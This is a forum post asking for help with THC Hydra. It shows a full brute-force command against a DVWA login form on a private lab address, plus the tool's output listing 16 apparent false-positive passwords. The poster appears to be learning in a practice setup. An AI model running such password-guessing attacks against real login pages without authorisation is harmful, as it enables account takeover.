Forum Thread: In Need of Help with THC Hydra

I have been trying to make this program work for the past 3 days but I keep encountering the same problem over and over. I've followed the tutorial here So here is my command :

root@Refused:~# hydra -l admin -P /usr/share/dirb/wordlists/small.txt 192.168.1.11 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

And here is the problem :

ATTEMPT target 192.168.1.11 - login "admin" - pass "0" - 1 of 959 child 0 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "00" - 2 of 959 child 1 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "01" - 3 of 959 child 2 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "02" - 4 of 959 child 3 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "03" - 5 of 959 child 4 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "1" - 6 of 959 child 5 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "10" - 7 of 959 child 6 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "100" - 8 of 959 child 7 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "1000" - 9 of 959 child 8 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "123" - 10 of 959 child 9 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "2" - 11 of 959 child 10 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "20" - 12 of 959 child 11 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "200" - 13 of 959 child 12 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "2000" - 14 of 959 child 13 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "2001" - 15 of 959 child 14 (0/0)
ATTEMPT target 192.168.1.11 - login "admin" - pass "2002" - 16 of 959 child 15 (0/0)
80http-post-form host: 192.168.1.11 login: admin password: 02
80http-post-form host: 192.168.1.11 login: admin password: 0
80http-post-form host: 192.168.1.11 login: admin password: 00
80http-post-form host: 192.168.1.11 login: admin password: 1
80http-post-form host: 192.168.1.11 login: admin password: 03
80http-post-form host: 192.168.1.11 login: admin password: 1000
80http-post-form host: 192.168.1.11 login: admin password: 123
80http-post-form host: 192.168.1.11 login: admin password: 01
80http-post-form host: 192.168.1.11 login: admin password: 10
80http-post-form host: 192.168.1.11 login: admin password: 100
80http-post-form host: 192.168.1.11 login: admin password: 2
80http-post-form host: 192.168.1.11 login: admin password: 20
80http-post-form host: 192.168.1.11 login: admin password: 200
80http-post-form host: 192.168.1.11 login: admin password: 2000
80http-post-form host: 192.168.1.11 login: admin password: 2001
80http-post-form host: 192.168.1.11 login: admin password: 2002
1 of 1 target successfully completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-13 19:03:49

Basically, I get 16 valid password, all of which are false-positive and those 16 words are the first in my word list.

For all of you who can help me, thanks In advance for the help !

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active